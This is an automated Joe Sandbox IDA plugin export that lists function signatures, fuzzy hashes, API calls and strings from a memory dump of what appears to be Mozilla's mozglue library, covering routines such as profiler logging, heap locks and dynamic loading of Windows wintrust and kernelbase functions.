Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
String ID:
API String ID: 2948488910-0
Opcode ID: 8c0d913205532808d4ad12abd4378fdf811cc1a017f8db68613fcfe73f3795b5
Instruction ID: 64b51d3cc378405ec708eceadbf031588b5a9b66436ba02c0d654648b910c11a
Opcode Fuzzy Hash: 8c0d913205532808d4ad12abd4378fdf811cc1a017f8db68613fcfe73f3795b5
Instruction Fuzzy Hash: F1110CF5A052545BEB249A78AC497AFBEACAF01758F140475E806DB340E379DD0087F2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C0180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6B0C0270
GetCurrentThreadId.KERNEL32 ref: 6B0C02E9
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C02F6
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C033A

Strings

about:blank, xrefs: 6B0C020F

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 296f31535899b48114f5a90bc30bd46ebb1adf84359015a0d288ed275cfb15f4
Instruction ID: fce81034104659a2b81310ef6a03332a43321ba80c16a979451baf2eba8d7e81
Opcode Fuzzy Hash: 296f31535899b48114f5a90bc30bd46ebb1adf84359015a0d288ed275cfb15f4
Instruction Fuzzy Hash: 7E519DB5A042198FCB08DF58D8806AEBFF9FF88324F504559C91AA7351E735F942CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BE100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0BE12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6B0BE084,00000000), ref: 6B0BE137

Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6B0BE196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6B0BE1E9

Part of subcall function 6B0B99A0: GetCurrentThreadId.KERNEL32 ref: 6B0B99C1
Part of subcall function 6B0B99A0: AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99CE
Part of subcall function 6B0B99A0: ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6B0BE13F

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 9d7177f3be67d5576696ed3ac700e84db0fd0ceb8e5816855af4e43387a3a98a
Instruction ID: 6c75d6d08c94e445ebb0d6905bc3254ea7261b88688328db86dfa6020b12a39d
Opcode Fuzzy Hash: 9d7177f3be67d5576696ed3ac700e84db0fd0ceb8e5816855af4e43387a3a98a
Instruction Fuzzy Hash: 35312A716043009FD70CDF68944136AFFE6EFDA248F00896DE8995B341EB79C945C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B0210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0B0222
moz_xmalloc.MOZGLUE(0000000C), ref: 6B0B0231

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0B028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6B0B02F7

Strings

@, xrefs: 6B0B02D8

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: 5f479c40525286458d7b8688e5667caab0e0a8b0b032bed2d05fd915a72b7688
Instruction ID: 04bce77298a5cc40dddb3088a36311ea0bc936d2165ec4006e7cc6d6ad101567
Opcode Fuzzy Hash: 5f479c40525286458d7b8688e5667caab0e0a8b0b032bed2d05fd915a72b7688
Instruction Fuzzy Hash: A4319DB2A046108FEB68CF68C980B1ABBF6FF44714B14856DD95ADB340E736ED05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BE020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0BE047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BE04F

Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BE0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6B0BE057

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 9b9f85e8d0ce29fd8f3dfd01d67816ea7dc924736530023a67dcdd4f0f0078dd
Instruction ID: f4605a38dc564525d79e45c2d74bc371d95a273ff9963da294b7696249066502
Opcode Fuzzy Hash: 9b9f85e8d0ce29fd8f3dfd01d67816ea7dc924736530023a67dcdd4f0f0078dd
Instruction Fuzzy Hash: B1218374A101089FDF08DF74D859BAEBFA9EF45208F144864ED0A97341DB3AD945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DAB90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

SearchPathW.KERNEL32(?,6B09BFBD,.dll,00000000,00000000,00000000,6B09BFBD), ref: 6B0DABBD
moz_xmalloc.MOZGLUE(00000001), ref: 6B0DABD8

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6B0DABEB
SearchPathW.KERNEL32(?,?,.dll,00000001,?,00000000), ref: 6B0DAC03

Strings

.dll, xrefs: 6B0DABB4, 6B0DABFA

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: PathSearch$mallocmemsetmoz_xmalloc
String ID: .dll
API String ID: 3063185715-2738580789
Opcode ID: f4d87439fb7d8e2e8680945719d81a0780281e3ff6450e9a3ee3e10edbeedc65
Instruction ID: e9eadb22b2f47edf5bfd205f71b0db246351819de27d7094bc09ed1dd884e9b9
Opcode Fuzzy Hash: f4d87439fb7d8e2e8680945719d81a0780281e3ff6450e9a3ee3e10edbeedc65
Instruction Fuzzy Hash: 9301D2B2A0020A6FEB144E74DC45BBFBEAEEB81250F150035FD09D3200E67A9D454BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6B07F0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6B07EE51,?), ref: 6B07F0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6B07F0C2

Strings

Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6B07F0DC
ole32, xrefs: 6B07F0AD
Could not find CoTaskMemFree, xrefs: 6B07F0E3

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 997ca51d5833786b65d2b7b517922da641262c4a331e61f5b2f9a84c4b860854
Instruction ID: e59b4d124b43fe92b47db76ab51fd1e640526fce76513b5e71dd1c38f0dd4f54
Opcode Fuzzy Hash: 997ca51d5833786b65d2b7b517922da641262c4a331e61f5b2f9a84c4b860854
Instruction Fuzzy Hash: 12E0DFB0744341ABAF2C7AF6A818B2A7FDEAF52605300803DED06C1700EE38E010CAB5

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D73E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32.dll,?,?,6B08434E), ref: 6B0D73EB
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwarenessContext), ref: 6B0D7404
FreeLibrary.KERNEL32(?,?,6B08434E), ref: 6B0D7413

Strings

SetProcessDpiAwarenessContext, xrefs: 6B0D73FE
user32.dll, xrefs: 6B0D73E6

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SetProcessDpiAwarenessContext$user32.dll
API String ID: 145871493-397433131
Opcode ID: 256de321d3e99f6132ed8bf7f7a9f11a17a709ccabf32032b8e3797924115650
Instruction ID: f86315574d7d6ba02bae4d666403a44745fd1a15d10c707b53cbbd2eb430aea3
Opcode Fuzzy Hash: 256de321d3e99f6132ed8bf7f7a9f11a17a709ccabf32032b8e3797924115650
Instruction Fuzzy Hash: 6AE04F702013019FE7141FA4E918706BFEDEF05341F008829EE8AC3740E7B5D4008B60

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B087297), ref: 6B0B0128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6B0B0147
FreeLibrary.KERNEL32(?,6B087297), ref: 6B0B015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6B0B0141
wintrust.dll, xrefs: 6B0B0123

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 587eba28b02bf3482b308c8b7a8c25abe0b881f0e5e536a119601621bdfebe85
Instruction ID: 0dd2f9f5255b7c06b0054725e8e2bbec2b4cb42f9f5ae1831abaa1e4589fda9f
Opcode Fuzzy Hash: 587eba28b02bf3482b308c8b7a8c25abe0b881f0e5e536a119601621bdfebe85
Instruction Fuzzy Hash: 02E09A74649205AFEF085F69E9087167FEDA757341F004426AE05C6350E779C001CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B0170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B087308), ref: 6B0B0178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6B0B0197
FreeLibrary.KERNEL32(?,6B087308), ref: 6B0B01AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6B0B0191
wintrust.dll, xrefs: 6B0B0173

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 83aa6f0cedba591120206e5394cbcfea5e22b96bd1451569b3aadf94093ddb64
Instruction ID: fcc3d2d757768150e055050565a22da7d1ab6eb6b86932b4f78e321c062c5ec9
Opcode Fuzzy Hash: 83aa6f0cedba591120206e5394cbcfea5e22b96bd1451569b3aadf94093ddb64
Instruction Fuzzy Hash: 2BE092747862059FEF485F65EA48B057FEEB706245F044466EE9582290EBB9C082CA34

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B01C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B087266), ref: 6B0B01C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6B0B01E7
FreeLibrary.KERNEL32(?,6B087266), ref: 6B0B01FE

Strings

wintrust.dll, xrefs: 6B0B01C3
CryptCATAdminReleaseContext, xrefs: 6B0B01E1

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: b09549c2349854d97aec0152ef089d2b82a002c0d35a82a6212bde9c974aef17
Instruction ID: 03c2e4ce1e85bc8d52b5b7b75a9211a7bc3950b9bae7bc053ac9a40eb30ad4e1
Opcode Fuzzy Hash: b09549c2349854d97aec0152ef089d2b82a002c0d35a82a6212bde9c974aef17
Instruction Fuzzy Hash: AAE09A746853469FEF085F65E90870A7FEDAB07341F404425EE05C5290EBB9C002DF20

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B087204), ref: 6B0B0088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6B0B00A7
FreeLibrary.KERNEL32(?,6B087204), ref: 6B0B00BE

Strings

CryptCATAdminAcquireContext2, xrefs: 6B0B00A1
wintrust.dll, xrefs: 6B0B0083

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 40f9a6d4de9272f9364e41c9b3ceacb9bb42b8ce6bf588f56ecd28ae9c255a3e
Instruction ID: 4fd8a2b86a8ec99317148d36aff96f5892c7ae165a312c0b60f4c5e4ecd7a1af
Opcode Fuzzy Hash: 40f9a6d4de9272f9364e41c9b3ceacb9bb42b8ce6bf588f56ecd28ae9c255a3e
Instruction Fuzzy Hash: 7EE092756593059BEF08AF66E9187057FEEA70B381F508026AD15C2390EBBAC006DF21

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B087235), ref: 6B0B00D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6B0B00F7
FreeLibrary.KERNEL32(?,6B087235), ref: 6B0B010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6B0B00F1
wintrust.dll, xrefs: 6B0B00D3

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 70996774d1d5441dbf76c045e8be403d04e2d072648e408c5096543f32543a6d
Instruction ID: d4244ff50d4d3d071aa071a6a04cead71e523be5b0577565999e01cdbf1eaf5e
Opcode Fuzzy Hash: 70996774d1d5441dbf76c045e8be403d04e2d072648e408c5096543f32543a6d
Instruction Fuzzy Hash: 20E0927474A3059BEF189F65AA497357FEEE706A41F448429AD4A82650EBB9C082CA20

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DC240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B0877F6), ref: 6B0DC248
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6B0DC267
FreeLibrary.KERNEL32(?,6B0877F6), ref: 6B0DC27C

Strings

CryptCATAdminAcquireContext, xrefs: 6B0DC261
wintrust.dll, xrefs: 6B0DC243

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext$wintrust.dll
API String ID: 145871493-3357690181
Opcode ID: 99a051c759955ece35912fb290190041b69d4582961effe5fb46c92fdbe9cb6a
Instruction ID: 35eb5e07948b23f59620280be3744ee316d48dc55f88dba980d18b4c3667440b
Opcode Fuzzy Hash: 99a051c759955ece35912fb290190041b69d4582961effe5fb46c92fdbe9cb6a
Instruction Fuzzy Hash: 78E0B6746413019BEF086F66E8087157FEDEB0B384F504066ED05C2240E7B8C042DF64

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DC290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6B0877C5), ref: 6B0DC298
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6B0DC2B7
FreeLibrary.KERNEL32(?,6B0877C5), ref: 6B0DC2CC

Strings

CryptCATAdminCalcHashFromFileHandle, xrefs: 6B0DC2B1
wintrust.dll, xrefs: 6B0DC293

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
API String ID: 145871493-1423897460
Opcode ID: a3aabb800ed05c9d1197742f090f3f7eb56c65a4f08bd519aae22e3ae181e24c
Instruction ID: e46e982bc604be7d6d5720f293c40724718452675492835f6051c009b93767b3
Opcode Fuzzy Hash: a3aabb800ed05c9d1197742f090f3f7eb56c65a4f08bd519aae22e3ae181e24c
Instruction Fuzzy Hash: 5DE0B674742306AFEF046F69E9087167FEDFB06304F440026AD0A86750E7BDC002CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6B0DBAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernelbase.dll,?,6B0805BC), ref: 6B0DBAB8
GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6B0DBAD7
FreeLibrary.KERNEL32(?,6B0805BC), ref: 6B0DBAEC

Strings

VirtualAlloc2, xrefs: 6B0DBAD1
kernelbase.dll, xrefs: 6B0DBAB3

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: VirtualAlloc2$kernelbase.dll
API String ID: 145871493-1188699709
Opcode ID: 53ad387ea0c337a5922d5366ce98c118a12b629ff1d9f040c59d094f51a0be83
Instruction ID: 3ab417bed38f661a56312401ae3e3f8029c0b8a1728893bce15404541a3c2397
Opcode Fuzzy Hash: 53ad387ea0c337a5922d5366ce98c118a12b629ff1d9f040c59d094f51a0be83
Instruction Fuzzy Hash: 9EE0B6707063829BDF049F66E958B157FEDEB06324F1C006AAD0682240EBB8C006CB64

Uniqueness

Uniqueness Score: -1.00%

